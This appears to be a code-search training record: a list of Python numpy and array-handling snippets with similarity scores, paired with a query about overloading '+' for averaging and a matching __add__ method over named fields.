"def dataArr(filename):\r\n #Open the file\r\n f=h5py.File(filename,'r')\r\n \r\n #Initialize the data arrays\r\n cdata=[]\r\n idxset=[]\r\n vertices=[]\r\n \r\n #Open groups in the file\r\n for group in f.keys():\r\n# print('Group- '+group)\r\n \r\n #Get the group\r\n currGroup=f[group]\r\n \r\n #Open keys in the group\r\n for key in currGroup.keys():\r\n# print('Key- '+key)\r\n \r\n #Append the data to the respective arrays\r\n if key=='cdata(Complex)':\r\n cdataGroup=currGroup[key]\r\n \r\n imag=[]\r\n real=[]\r\n #Open the keys in cdata\r\n for subkey in cdataGroup.keys():\r\n# print('Subkey- '+subkey)\r\n \r\n #Get the real and imaginary parts of the array\r\n if subkey=='Imag':\r\n imag=cdataGroup[subkey][()]\r\n elif subkey=='Real':\r\n real=cdataGroup[subkey][()]\r\n \r\n #Convert lists to numpy arrays\r\n imag=np.array(imag)\r\n real=np.array(real)\r\n #Get the cdata value\r\n cdata=real+1j*imag\r\n \r\n elif key=='idxset':\r\n idxset=currGroup[key][()]\r\n elif key=='vertices':\r\n vertices=currGroup[key][()]\r\n \r\n #Remove the z component from the vertices\r\n xVals=[]\r\n yVals=[]\r\n newVertices=[]\r\n for vertex in vertices:\r\n xVals.append(vertex[0])\r\n yVals.append(vertex[1])\r\n newVertices.append([vertex[0],vertex[1]])\r\n vertices=newVertices\r\n \r\n #Convert to numpy arrays\r\n cdata=np.array(cdata)\r\n xVals=np.array(xVals)\r\n yVals=np.array(yVals)\r\n \r\n #Close the file\r\n f.close()\r\n \r\n return cdata, xVals, yVals",
"def numpy_basics():\n # a) tworzenie macierzy\n X = np.zeros([3,3]) # macierz 0\n print np.array([[1.1]]) #tworzenie macierzy z listy python\n Y = np.eye(3,3) # macierz jednostkowa\n X[0,0] = 10.0 # ustawienie elementu\n print \"Array dimensions \",X.shape #wymiar macierzy\n\n # b) dodawanie macierzowe\n print (X+Y)\n\n # c) mnozenie macierzowe\n print np.dot(X,Y)\n\n # d) pobieranie elementow\n print X[1,1] #element X_22\n print X[1,:] #caly drugi wiersz, zwraca tez np.array\n\n # e) w kazdym wierszu najwiekszy element macierzy X+Y\n #TODO: fill in\n print (X+Y).max(axis=1) # \"zjadamy\" 2 wymiar, czyli kolumny",
"def test02(self):\n dtype = np.dtype(\"f4,f8\")\n a = np.ones(30000, dtype=dtype)\n ac = bcolz.carray(a, dtype=dtype)\n self.assertTrue(ac.dtype == dtype)\n self.assertTrue(a.dtype == ac.dtype)\n # print \"ac-->\", `ac`\n assert_array_equal(a, ac[:], \"Arrays are not equal\")",
"def test_empty(self):\n a = np.ones((3, 4, 5))\n ai = np.ones((3, 0, 5), dtype=np.intp)\n\n actual = take_along_axis(a, ai, axis=1)\n assert_equal(actual.shape, ai.shape)",
"def flatten_array(arr):\n flat_array = []\n for item in arr:\n if isinstance(item, (list, tuple, set, np.ndarray)):\n flat_array.extend(flatten_array(item))\n else:\n flat_array.append(item)\n return np.array(flat_array)",
"def twoDize(array, width):\n count = 0\n output = []\n temp = []\n while len(array) > 0:\n temp.append(array.pop())\n if len(temp) == width:\n output.append(temp)\n temp = []\n return output",
"def test02(self):\n a = np.arange(self.N, dtype='uint64')\n b = bcolz.carray(a, rootdir=self.rootdir)\n c = iter(b.view())\n u = c.iter(3)\n w = b.iter(2)\n self.assertEqual(sum(a[3:]), sum(u))\n self.assertEqual(sum(a[2:]), sum(w))",
"def test_integer_split_2D_default(self):\n a = array([arange(10),arange(10)])\n res = array_split(a,3)\n desired = [array([arange(10)]),array([arange(10)]),array([])]\n compare_results(res,desired)",
"def __call__(self, batch: base.Batch, key: base.RngKey) -> base.Array:",
"def array (self, length, width):\n\t\treturn [[0 for i in range(width)] for j in range(length)] #List comprehensions (Works like two for loops)",
"def iterated_array_from(\r\n self, func: Callable, cls: object, array_lower_sub_2d: Array2D\r\n ) -> Array2D:\r\n\r\n if not np.any(array_lower_sub_2d):\r\n return array_lower_sub_2d.slim\r\n\r\n iterated_array = np.zeros(shape=self.shape_native)\r\n\r\n threshold_mask_lower_sub = self.mask\r\n\r\n for sub_size in self.sub_steps[:-1]:\r\n array_higher_sub = self.array_at_sub_size_from(\r\n func=func, cls=cls, mask=threshold_mask_lower_sub, sub_size=sub_size\r\n )\r\n\r\n try:\r\n threshold_mask_higher_sub = self.threshold_mask_via_arrays_from(\r\n array_lower_sub_2d=array_lower_sub_2d,\r\n array_higher_sub_2d=array_higher_sub,\r\n )\r\n\r\n iterated_array = self.iterated_array_jit_from(\r\n iterated_array=iterated_array,\r\n threshold_mask_higher_sub=threshold_mask_higher_sub,\r\n threshold_mask_lower_sub=threshold_mask_lower_sub,\r\n array_higher_sub_2d=array_higher_sub,\r\n )\r\n\r\n except ZeroDivisionError:\r\n return self.return_iterated_array_result(iterated_array=iterated_array)\r\n\r\n if threshold_mask_higher_sub.is_all_true:\r\n return self.return_iterated_array_result(iterated_array=iterated_array)\r\n\r\n array_lower_sub_2d = array_higher_sub\r\n threshold_mask_lower_sub = threshold_mask_higher_sub\r\n\r\n array_higher_sub = self.array_at_sub_size_from(\r\n func=func,\r\n cls=cls,\r\n mask=threshold_mask_lower_sub,\r\n sub_size=self.sub_steps[-1],\r\n )\r\n\r\n iterated_array_2d = iterated_array + array_higher_sub.binned.native\r\n\r\n return self.return_iterated_array_result(iterated_array=iterated_array_2d)",
"def build_timeseries(mat, TIME_STEPS, y_col_index = None):\n dim_0 = mat.shape[0] - TIME_STEPS\n D = mat.shape[1]\n x = np.zeros((dim_0, TIME_STEPS, D))\n if y_col_index:\n y = np.zeros((dim_0, ))\n else:\n y = np.zeros((dim_0, D))\n \n for i in range(dim_0):\n x[i] = mat[i:TIME_STEPS+i]\n if y_col_index:\n y[i] = mat[TIME_STEPS + i, y_col_index]\n else:\n y[i] = mat[TIME_STEPS + i, :]\n\n print(\"length of time-series i/o\",x.shape,y.shape)\n return x, y",
"def _frz(a):\n if a.ndim == 0:\n a.shape = (1,)\n return a",
"def vectorized(self):\n return False",
"def _share_array(arr_np, typecode_or_type):\n\n arr = mp.RawArray(typecode_or_type, arr_np.ravel())\n return arr, arr_np.shape",
"def test04d(self):\n a = np.arange(1e3)\n b = bcolz.carray(a, chunklen=100, rootdir=self.rootdir)\n sl = slice(None, None, 2)\n # print \"b[sl]->\", `b[sl]`\n assert_array_equal(a[sl], b[sl], \"Arrays are not equal\")",
"def numpy_array(arr: Array) -> np.ndarray:\n\n if not isinstance(arr, np.ndarray):\n arr_np = np.asarray(arr)\n if isinstance(arr, (list, tuple)) and len(arr_np.shape) == 2:\n arr_np = np.transpose(arr_np)\n return arr_np\n else:\n return arr",
"def single_dimension(array: np.ndarray) -> None:\n if array.ndim > 1:\n raise ValueError(\n f\"Array was multidimensional. Must pass 1D array; found {array.ndim}\"\n )",
"def is1d(a):\n return np.sum(asarray(asarray(a).shape) > 1) <= 1",
"def lin_t_func(self):\n mat = self.precalc_mat[0]\n dim_x = self.sys[2].shape[0]\n\n return mat[1, 0, 1][dim_x:]",
"def test02(self):\n a = np.arange(101)\n b = bcolz.carray(a)\n c = b[[]]\n r = a[[]]\n assert_array_equal(c, r, \"fancy indexing does not work correctly\")",
"def getShortArray2D(self) -> typing.List[typing.List[int]]:\n ...",
"def observation(self, obs):\n\n# import pdb;pdb.set_trace()\n return np.moveaxis(obs, 2, 0)",
"def _check_array(self, X):\n x = np.copy(X)\n if np.isfortran(x) is False:\n # print (\"Array must be in Fortran-order. Converting now.\")\n x = np.asfortranarray(x)\n if self.sampling > x.shape:\n raise ValueError(\"'sampling' is greater than the dimensions of X\")\n return x",
"def com_msd_multiple_realizations(t_target_array, folder, prefix, n_realization, attrib = 'x_array'):\n #first stich together all the arrays\n #read in he first one\n file_name = prefix + \"_0\" + \".pkl\"\n file_address = os.path.join(folder, file_name)\n with open(file_address, 'rb') as input:\n dataHolder = pickle.load(input)\n x_big = getattr(dataHolder, attrib)\n t_big = dataHolder.t_array\n for i in range(1,n_realization):\n file_name = prefix + \"_\" + str(i) + \".pkl\"\n file_address = os.path.join(folder, file_name)\n with open(file_address, 'rb') as input:\n dataHolder = pickle.load(input)\n x_mat = getattr(dataHolder, attrib)\n t_mat = dataHolder.t_array\n x_big = np.vstack((x_big, x_mat))\n t_big = np.vstack((t_big, t_mat))\n out_put_size = len(t_target_array)\n com_array = np.zeros(out_put_size)\n msd_array = np.zeros(out_put_size)\n for i in range(out_put_size):\n t = t_target_array[i]\n com_array[i], msd_array[i] = com_msd_at_given_time(t, x_big, t_big)\n return com_array, msd_array",
"def process_array(arr, session):\n img = Image.fromarray(arr)\n cim_resized = img.resize((40,40), resample=Image.LANCZOS)\n n = cim_resized.convert('L')\n cropped = np.array(n).astype(np.float64)\n normalized_cropped_image = cropped - np.mean(cropped)\n normalized_cropped_image = normalized_cropped_image.reshape((-1, image_size, image_size, num_channels)).astype(np.float32)\n predicted_arr = predict_live(normalized_cropped_image, session)\n label = ''.join(['' if int(x[0]) == 10 else str(x[0]) for x in list(predicted_arr)])\n print 'NUMBER IS : ' + label",
"def SetDataVolume(vDataSet,arr,aIndexC,aIndexT):\r\n nx = vDataSet.GetSizeX()\r\n ny = vDataSet.GetSizeY()\r\n nz = vDataSet.GetSizeZ()\r\n dtype = GetType(vDataSet)\r\n\r\n if DEBUG:\r\n print(\"SetDataVolume\")\r\n print(\"vDataSet:\",(nz,ny,nx),GetType(vDataSet))\r\n print(arr.shape)\r\n print(arr.dtype)\r\n print(aIndexC)\r\n print(aIndexT)\r\n\r\n #Make sure the data is in range and convert the array\r\n s = arr\r\n if dtype != arr.dtype:\r\n miset,maset = GetTotalRange(vDataSet)\r\n arr[arr<miset]=miset\r\n arr[arr>maset]=maset\r\n s = arr.astype(dtype)\r\n\r\n if dtype == np.uint8:\r\n SetData = vDataSet.SetDataVolumeAs1DArrayBytes\r\n s = s.tostring()\r\n elif dtype == np.uint16:\r\n SetData = vDataSet.SetDataVolumeAs1DArrayShorts\r\n s = np.ravel(s)\r\n elif dtype == np.float32:\r\n SetData = vDataSet.SetDataVolumeAs1DArrayFloats\r\n s = np.ravel(s)\r\n SetData(s,aIndexC,aIndexT)\r\n\r\n if 0:\r\n #Old method slice by slice\r\n if dtype == np.uint8:\r\n SetData = vDataSet.SetDataSubVolumeAs1DArrayBytes\r\n elif dtype == np.uint16:\r\n s = np.ravel(s)\r\n SetData = vDataSet.SetDataSubVolumeAs1DArrayShorts\r\n elif dtype == np.float32:\r\n s = np.ravel(s)\r\n SetData = vDataSet.SetDataSubVolumeAs1DArrayFloats\r\n\r\n for z in range(nz):\r\n t = time.time()\r\n l = arr[z,...].swapaxes(0,1).tostring()\r\n SetData(l,0,0,z,aIndexC,aIndexT,nx,ny,1)\r\n print z,time.time()-t\r\n\r\n #vDataSet.SetChannelRange(aIndexC,miset,maset)\r",
"def transform(array):\n assert array.shape == (10, 2)\n new = Array(columns=\"abcd\")\n for x, y in array:\n new.append([x, y, x + y, x * y])\n return new",
"def _arrayCollapse(array_in, method):\n \n # Perform an numpy.array collapse along the z-axis\n if method == 'sum':\n print('(3d_collapse): Sum collapse of extracted slices ...')\n collapsed_array = np.sum(array_in, axis=0)\n \n elif method == 'mean':\n print('(3d_collapse): Mean collapse of extracted slices ...')\n collapsed_array = np.mean(array_in, axis=0)\n \n elif method == 'median':\n print('(3d_collapse): Median collapse of extracted slices ...')\n collapsed_array = np.median(array_in, axis=0)\n \n # Returns an array of type numpy.array \n return collapsed_array"
] | [
"0.582377",
"0.581599",
"0.5703788",
"0.56798375",
"0.5665006",
"0.5622838",
"0.5622838",
"0.561631",
"0.5614652",
"0.56125855",
"0.56112605",
"0.5594524",
"0.5558285",
"0.5528516",
"0.5528516",
"0.5513754",
"0.5506847",
"0.54488146",
"0.54157764",
"0.5404244",
"0.5395436",
"0.5388703",
"0.538565",
"0.53848654",
"0.5381488",
"0.5319798",
"0.5309512",
"0.530908",
"0.5292067",
"0.5282733",
"0.52671903",
"0.52671903",
"0.52671903",
"0.52671903",
"0.52478147",
"0.52454674",
"0.52351177",
"0.5225853",
"0.5216724",
"0.5201503",
"0.51918685",
"0.51917815",
"0.5188283",
"0.5183179",
"0.5171634",
"0.51666695",
"0.51612175",
"0.51444757",
"0.5136204",
"0.5133477",
"0.5117891",
"0.5103355",
"0.50895596",
"0.5086439",
"0.50817424",
"0.5074625",
"0.5064842",
"0.5061334",
"0.5045932",
"0.5045254",
"0.5032828",
"0.50300044",
"0.5029875",
"0.5025922",
"0.50244707",
"0.5015606",
"0.50153494",
"0.5010778",
"0.5010361",
"0.49933168",
"0.49922624",
"0.4989951",
"0.4986508",
"0.4986391",
"0.4985182",
"0.49807572",
"0.49777007",
"0.49723205",
"0.49699524",
"0.49685207",
"0.49637532",
"0.49631444",
"0.49627608",
"0.4956602",
"0.495197",
"0.49519342",
"0.49508312",
"0.49492353",
"0.49492076",
"0.49474296",
"0.49470362",
"0.49453074",
"0.49414185",
"0.49411428",
"0.4938209",
"0.49355054",
"0.49310136",
"0.49294138",
"0.49279794",
"0.49275273"
] | 0.5034996 | 60 |
overload + which is useful for averaging | def __add__(self, other):
return self.__class__(
{
name:
self.__getattribute__(name) + other.__getattribute__(name)
for name in self._fields
}
) | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def add_mean(mean):\n return sum(mean)/len(mean)",
"def __iadd__(self,value):\n if isinstance(value,LiveStat):\n raise Exception(\"Cannot sum statistics\")\n if value.vcount < 1 or self.vcount < 1:\n raise Exception(\"Cannot sum empty statistics\")\n else:\n # sum of two considered pairwise: z_i = stat(x_i + y_i)\n #\n # data have different weights due to number of samples.. TODO\n self.vmin += value.vmin \n self.vmax += value.vmax\n self.vmean += value.vmean\n self.vsum += value.vsum\n # variance is sum of variance?\n self.vm2 += value.vm2\n # TODO vm3 vm4\n self.vcount = min(value.vcount,self.vcount)\n self.vcountsq = self.vcount**2\n self.dirty = True\n print (\"add Missing: M3 and M4\")\n else:\n # constant bias\n if self.vmin is not None:\n self.vmin += value\n self.vmax += value\n self.vmean += value\n self.vsum += self.vcount*value\n print (\"add Missing: M3 and M4\")\n self.dirty = True\n return self",
"def __add__(self,other):\n self.numerator=self.numerator*other.denominator\n other.numerator=self.denominator*other.numerator\n resultnumerator = self.numerator+other.numerator\n resultdenominator = self.denominator*other.denominator \n newvalues = (resultnumerator,resultdenominator)\n return newvalues",
"def avg(a,b):\r\n return (a+b)/2",
"def add_to_average(total_count, total_value, new_value):\n return ((1.0 * total_count * total_value) + new_value) / (total_count + 1)",
"def average(arg1, *args): \n return (arg1 + sum(args)) / (1 + len(args))",
"def average(x, y):\n #helper function for get_accuracy\n average = (x+y)/2 \n return average",
"def __iadd__(self, other):\n\n if isinstance(other, float):\n self.iadd_scalar(other)\n else:\n self.iadd(other)",
"def __add__(self, other):\n output = Spectrum(self.wavelengths, self.intensities)\n for wavelength, intensity in other:\n if output[wavelength]:\n output[wavelength] += intensity\n else:\n output[wavelength] = intensity\n return output",
"def add(self, *args):\n sum = 0\n for arg in args:\n sum += float(arg)\n return sum",
"def __add__(self, other):\n if isinstance(other, int) or isinstance(other, float):\n return Amp(self.amps + other, self.amp_unit, self.freq, self.freq_unit)\n if self.amp_unit != other.amp_unit:\n raise ArithmeticError(f\"The objects' amp units {self.amp_unit} and {other.amp_unit} are not the same.\")\n if self.freq != other.frequency:\n raise ArithmeticError(f\"The objects' frequency {self.freq} and {other.frequency} are not the same.\")\n if self.freq_unit != other.freq_unit:\n raise ArithmeticError(f\"The objects' frequency units {self.freq_unit} and {other.freq_unit} \"\n f\"are not the same.\")\n amp_sum = self.amps + other.amps\n return Amp(amp_sum, self.amp_unit, self.freq, self.freq_unit)",
"def __add__( self, other ) :\n\n try :\n other = float( other )\n c_ls = self.copy( )\n for l, c_l in enumerate( c_ls ) : c_ls.coefficients[l] += other\n except :\n self.checkSameSeriesType( other )\n c_l1, c_l2 = self, other\n if( len( self ) < len( other ) ) : c_l1, c_l2 = other, self\n c_ls = c_l1.copy( )\n for l, c_l in enumerate( c_l2 ) : c_ls.coefficients[l] += c_l\n return( c_ls )",
"def __iadd__(self, other):\n if abs(self.T - other.T) > 1E-5:\n msg = \"The two objects being added needs to have the same \"\n msg += \"temperature.\"\n raise ValueError(msg)\n\n if self.ref_value < other.ref_value:\n diff = self.ref_value - other.ref_value\n other._average *= np.exp(self.beta * diff)\n other.ref_value = self.ref_value\n else:\n diff = other.ref_value - self.ref_value\n self.ref_value = other.ref_value\n self._average *= np.exp(self.beta * diff)\n self._average += other._average\n self.num_samples += other.num_samples\n return self",
"def __add__(self, other):\n return asarray(add(self, other))",
"def _avg(value1, value2, weight):\r\n if value1 is None:\r\n return value2\r\n if value2 is None:\r\n return value1\r\n return value2 * weight + value1 * (1 - weight)",
"def _avg(value1, value2, weight):\r\n if value1 is None:\r\n return value2\r\n if value2 is None:\r\n return value1\r\n return value2 * weight + value1 * (1 - weight)",
"def mean(vals):",
"def __add__(self, other):\n\n return self._binary_elementwise_op(other, np.add)",
"def __add__(self,that):\n return self.__opExpand2(that,np.add)",
"def avg(x, y):\n return (x + y)/2",
"def average(a1, a2, coord1, coord2, dim1, dim2, unit):\r\n \r\n avg = (a1 + a2)/2\r\n \r\n avg_xr = xr.DataArray(avg, coords=[coord1, coord2], dims=[dim1, dim2])\r\n avg_xr.attrs['units'] = unit\r\n \r\n return avg_xr",
"def average(data):\n return np.average(data)",
"def incremental_mean(x1, x2):\n n_a, mean_a = x1\n n_b, mean_b = x2\n n_ab = n_a + n_b # Total samples\n mean_ab = ((mean_a * n_a) + (mean_b * n_b)) / n_ab # Averaged mean\n return n_ab, mean_ab",
"def add(*args):\n #convert args to floats so we can do the maths\n values = list(args)\n for x in range(len(values)):\n values[x] = float(values[x])\n \n summation = str(ft.reduce(oper.add,values))\n return summation",
"def d_mean(x, y):\n return (x + y) / 2",
"def __add__(self, other):\n if not (isNumeric(other) or isinstance(other, Expression)):\n error_msg = (\n f'Invalid expression during addition to {self}: [{other}]'\n )\n raise excep.biogemeError(error_msg)\n return Plus(self, other)",
"def __add__(self, other):\n new_measure = Measure()\n settings = [\"raw\", \"fil\"]\n\n for rf in settings:\n new_measure.hit1[rf] = (self.hit1[rf] + other.hit1[rf])\n new_measure.hit3[rf] = (self.hit3[rf] + other.hit3[rf])\n new_measure.hit10[rf] = (self.hit10[rf] + other.hit10[rf])\n new_measure.mrr[rf] = (self.mrr[rf] + other.mrr[rf])\n new_measure.mr[rf] = (self.mr[rf] + other.mr[rf])\n return new_measure",
"def __iadd__(self, other):\n\n return self + other",
"def find_arithmetic_mean( *args):\n sum = 0\n for value in args:\n sum += value\n return sum/len(args)",
"def add(value1, value2):\n return 1 / (1.0 / value1 + 1.0 / value2)",
"def mean(self, like_params):\n\t\traise NotImplementedError",
"def __add__(self, other: Any) -> TypeValue:\n if isinstance(other, np.ndarray):\n return other + float(self)\n\n return self._like_self_from_float(\n float(self) + self._other_same_units(other)\n )",
"def __add__(self, other):\n pass",
"def __add__(self, other):\n pass",
"def average(num1, num2):\n\n return (num1 + num2) / 2",
"def get_mean(self, X):\n raise NotImplementedError",
"def avg_func(self, averaged_param: Tensor, source_param: Tensor,\n steps: int) -> None:\n averaged_param.mul_(1 - self.momentum).add_(\n source_param, alpha=self.momentum)",
"def _get_mean(self, sums, step):\n\n return sums/step",
"def __add__(self, other):\n raise NotImplementedError",
"def __add__(self, other):\n raise NotImplementedError",
"def __radd__(self, other):\n if not (isNumeric(other) or isinstance(other, Expression)):\n error_msg = (\n f'Invalid expression during addition to {self}: [{other}]'\n )\n raise excep.biogemeError(error_msg)\n return Plus(other, self)",
"def __add__(self, other):\r\n return self.add(other)",
"def __add__(self, other):\n\t\tif isinstance(other, Value):\n\t\t\treturn Value(self.val + other.val, sqrt(self.error**2 + other.error**2))\n\t\telse:\n\t\t\treturn Value(self.val + other, self.error)",
"def __add__(self, other):\n if other == 0:\n return self\n\n pmf = Pmf()\n for v1, p1 in self.items():\n for v2, p2 in other.items():\n pmf[v1 + v2] += p1 * p2\n return pmf",
"def __add__(self, other):\n return self.add(other)",
"def add(self):\n return self._do_calc(self.adder)",
"def add(self):\n return self._do_calc(self.adder)",
"def add(self):\n return self._do_calc(self.adder)",
"def __add__(self, other):\n if type(other) == int:\n other = float(other)\n\n if type(other) == float:\n other = Tensor(other)\n\n return F.Add.apply(self, other)",
"def __iadd__(self, other):\n\n other_data = self._setup_numeric(other)\n self.data[:] = self.data + other_data\n\n return self",
"def __radd__(self, other):\n return asarray(add(numpy.asarray(other), self))",
"def mean(self):\n return sum(p * x for x, p in self.items())",
"def plus(self, a, b):\n return a + b",
"def __iadd__(self, other):\n if not isinstance(other, type(self)):\n raise TypeError(\"Only DFs of the same type can be combined.\")\n self.dfs.extend(other.dfs)\n self.counts.extend(other.counts)\n self._unique = False\n self._original += other._original\n if self.label is None:\n if other.label is not None:\n self.label = other.label\n else:\n if other.label is not None:\n self.label += \"+\" + other.label\n self.tags.update(other.tags)\n self._average = None\n return self",
"def add(self,*datas):\n\t\tresult = sum(datas)\n\t\treturn result",
"def avg(u: np.ndarray, v: np.ndarray) -> np.ndarray:\n \n return (u + v) / 2.0",
"def print_avg():",
"def average(self):\n return self.summation() / self.count()",
"def modelmean(self, model_params, this_data, this_suff_stat):\n pass",
"def mean(self):\n raise RuntimeError(\"Needs to be implemented in base class\")",
"def __add__(self,sample):\n self.add(sample)",
"def __add__(self, other: PointOrIterableOrScalar) -> PointType:\n return self.__op(other, operator.add)",
"def __add__(self, value):\r\n if isinstance(value, (int, dec.Decimal)):\r\n return self.__class__(self._real + value, self._imag)\r\n elif isinstance(value, self.__class__):\r\n return self.__class__(self._real + value._real, self._imag + value._imag)\r\n raise TypeError(\r\n 'unsupported operand type(s) for +: {!r} and {!r}'.format(\r\n self.__class__.__name__, value.__class__.__name__\r\n )\r\n )",
"def average(self):\n return (self.current + self.last) / 2.0",
"def __radd__(self, other):\n return self + other",
"def __radd__(self, other):\n return self + other",
"def extend(self,data):\n n = float(len(data))\n if n == 0:\n return self\n M2 = 0\n M3 = 0\n M4 = 0\n mean = 0\n vmin = None\n vmax = None\n for x in data:\n mean += x/n \n if vmin is None:\n vmax = x\n vmin = x\n if x < vmin:\n vmin = x\n if x > vmax:\n vmax = x\n for x in data:\n d = x-mean\n M2 += (d**2)\n M3 += (d**3)\n M4 += (d**4)\n x = LiveStat(self.name)\n x.vmin = vmin\n x.vmax = vmax\n x.vmean = mean\n x.vm2 = M2\n x.vm3 = M3\n x.vm4 = M4\n x.vcount = int(n)\n x.vcountsq = x.vcount**2\n x.dirty = True\n self.merge(x)\n return self",
"def function2(a, b):\r\n average = (a + b) / 2\r\n return average",
"def vars_add ( self , var1 , var2 , name = '' , title = '' ) :\n \n f1 = isinstance ( var1 , num_types )\n f2 = isinstance ( var2 , num_types )\n\n if f1 and f2 :\n res = float ( var1 ) + float ( var2 )\n return ROOT.RooRealConstant.value ( res ) \n elif f1 :\n ## shortcut \n if 0 == var1 : return var2 ## SHORTCUT\n #\n var1 = ROOT.RooRealConstant.value ( var1 ) \n return self.vars_add ( var1 , var2 , name , title )\n elif f2 :\n ## shortcut \n if 0 == var2 : return var1 ## SHORTCUT\n #\n var2 = ROOT.RooRealConstant.value ( var2 ) \n return self.vars_add ( var1 , var2 , name , title )\n \n self.aux_keep.append ( var1 )\n self.aux_keep.append ( var2 )\n\n result = Ostap.MoreRooFit.Addition ( var1 , var2 )\n self.aux_keep.append ( result )\n \n return result",
"def __add__(self, other):\n return add_mps(self, other)",
"def ADD (self, n1, n2):",
"def __iadd__(self, m):\n if self.__mm_type(m):\n ls=len(self)\n for i in self.desc():\n for j in range(ls):\n self.g_val(self.val(i,j)+m.val(i,j),i,j)\n return self",
"def Mean(data):\n return data.mean()",
"def findMean (*args):\r\n total = my_module.addStuff(*args)\r\n return total/len(args)",
"def __add__(self, other):\n\n self._add_sub_error_checking(other)\n if (self._counts is None) ^ (other._counts is None):\n raise SpectrumError(\n 'Addition of counts-based and CPS-based spectra is ' +\n 'ambiguous, use Spectrum(counts=specA.counts+specB.counts) ' +\n 'or Spectrum(cps=specA.cps+specB.cps) instead.')\n\n if self._counts is not None and other._counts is not None:\n kwargs = {'counts': self.counts + other.counts}\n if self.livetime and other.livetime:\n kwargs['livetime'] = self.livetime + other.livetime\n else:\n warnings.warn('Addition of counts with missing livetimes, ' +\n 'livetime was set to None.', SpectrumWarning)\n else:\n kwargs = {'cps': self.cps + other.cps}\n spect_obj = Spectrum(\n bin_edges_kev=self.bin_edges_kev, **kwargs)\n return spect_obj",
"def __add__(self, other):\n base = deepcopy(self)\n base += other # (+=) == __iadd__\n return base",
"def __iadd__(self, other: PointOrIterableOrScalar) -> PointType:\n return self.__iop(other, operator.add)",
"def __add__(self, other):\n if isinstance(other, Factorization):\n other = other.value()\n return self.value() + other",
"def get_avg_points(self):\n pass",
"def add(a,b):\n return [a[0]+b[0],a[1]+b[1],a[2]+b[2],1.0]",
"def __iadd__(self,that):\n #return self.__opExpand1(that,np.add, out=self)\n return self.__opExpand2(that,np.add, out=self)",
"def __add__(self, other):\r\n if isinstance(other, vec4):\r\n return vec4(self.x+other.x, self.y+other.y, self.z+other.z, self.w+other.w)\r\n else:\r\n raise TypeError, \"unsupported operand type for +\"",
"def __add__(self, value):\n out = self.copy()\n out.addMath(Query.Math.Add, value)\n return out",
"def avg():\n\n # call sum method to add up the values in the collection & div by the num of items\n # call len method to compute the # of vals in collection which is divided by sum total \n mean = sum(inlist) / len(inlist)\n return mean \n\n # alternate method would be calling the reduce method with lamda \n # return reduce(lambda a, b: a + b, inlist) / len(inlist)",
"def forward_avg(array_in):\n return (array_in[:-1] + array_in[1:]) * 0.5",
"def __radd__(self,that):\n return self.__opExpand2(that,np.add)",
"def __add__(self, other):\n top = self.num*other.denom + self.denom*other.num\n bott = self.denom*other.denom\n return fraction(top, bott)",
"def __iadd__(self, other):\r\n if isinstance(other, vec4):\r\n self.x+=other.x\r\n self.y+=other.y\r\n self.z+=other.z\r\n self.w+=other.w\r\n return self\r\n else:\r\n raise TypeError, \"unsupported operand type for +=\"",
"def _add(self, other):\n raise NotImplementedError(\n \"{} does not support addition\".format(type(self)))",
"def pairmean(self, X, Y):\n raise NotImplementedError",
"def __add__(self, other):\n if isinstance(other, int) or isinstance(other, float):\n return Volt(self.volts + other, self.volt_unit, self.freq, self.freq_unit)\n if self.volt_unit != other.volt_unit:\n raise ArithmeticError(f\"The objects' volt units {self.volt_unit} and {other.volt_unit} are not the same.\")\n if self.freq != other.frequency:\n raise ArithmeticError(f\"The objects' frequency {self.freq} and {other.frequency} are not the same.\")\n if self.freq_unit != other.freq_unit:\n raise ArithmeticError(f\"The objects' frequency units {self.freq_unit} and {other.freq_unit} \"\n f\"are not the same.\")\n volt_sum = self.volts + other.volts\n return Volt(volt_sum, self.volt_unit, self.freq, self.freq_unit)",
"def __add__(self, other):\n cls = self.__class__\n return cls(self.x+other.x, self.y+other.y, self.z+other.z)",
"def __iadd__(self, other):\n raise NotImplementedError(\"Implement this if needed\")",
"def __add__(self,other):\n if isinstance(other, point):\n return self.add_points(other)\n else:\n return self.add_points_tuple(other)",
"def get_mean(self):\n self.meanval = np.mean(self.adulist)",
"def average(self, start, end):\n return self.integrate(start, end) / (end - start)",
"def __add__(self, other):\n\n result = Gaussian(mu=0, sigma=0)\n result.mu = self.mu + other.mu\n result.sigma = math.sqrt(self.sigma ** 2 + other.sigma ** 2)\n return result",
"def average(self):\n s = self.sum()\n flat_shape = self.flatten_shape(self.shape)\n num_of_elements = fct.reduce(opr.mul, flat_shape, 1)\n average = s / num_of_elements\n return average",
"def _mean(self,gp):\r\n return self.gp_link.transf(gp)",
"def _mean(self,gp):\r\n return self.gp_link.transf(gp)",
"def _mean(self,gp):\r\n return self.gp_link.transf(gp)"
] | [
"0.6968986",
"0.65940183",
"0.6575654",
"0.65746444",
"0.65079343",
"0.6471456",
"0.6436682",
"0.6430517",
"0.63915634",
"0.6386282",
"0.63346887",
"0.6332834",
"0.6318238",
"0.630995",
"0.63077843",
"0.63077843",
"0.62997144",
"0.6263618",
"0.62484145",
"0.6190253",
"0.61901087",
"0.6177614",
"0.61772394",
"0.6173142",
"0.61563313",
"0.6153058",
"0.6147462",
"0.61280227",
"0.61213803",
"0.6107852",
"0.6102746",
"0.6097704",
"0.60961413",
"0.60961413",
"0.6085084",
"0.6084174",
"0.60841405",
"0.60778",
"0.60578424",
"0.60578424",
"0.60482866",
"0.60417604",
"0.6030897",
"0.60300344",
"0.6020912",
"0.60116285",
"0.60116285",
"0.60116285",
"0.60070336",
"0.5994745",
"0.59900314",
"0.59880596",
"0.59792966",
"0.5974576",
"0.59650004",
"0.5962845",
"0.59600735",
"0.5958396",
"0.595809",
"0.5957704",
"0.5955476",
"0.5954642",
"0.59499013",
"0.5947199",
"0.5947073",
"0.5947073",
"0.59461105",
"0.5945545",
"0.593843",
"0.5935355",
"0.59220076",
"0.5921327",
"0.59149987",
"0.591168",
"0.5910612",
"0.59062356",
"0.5904224",
"0.5903234",
"0.59031504",
"0.58931905",
"0.589156",
"0.58845735",
"0.5883657",
"0.58789134",
"0.58696395",
"0.5867345",
"0.5865612",
"0.58559126",
"0.5855757",
"0.58553934",
"0.5854699",
"0.5853732",
"0.5851404",
"0.58501023",
"0.5838953",
"0.58340645",
"0.5828206",
"0.5826204",
"0.5820345",
"0.5820345",
"0.5820345"
] | 0.0 | -1 |
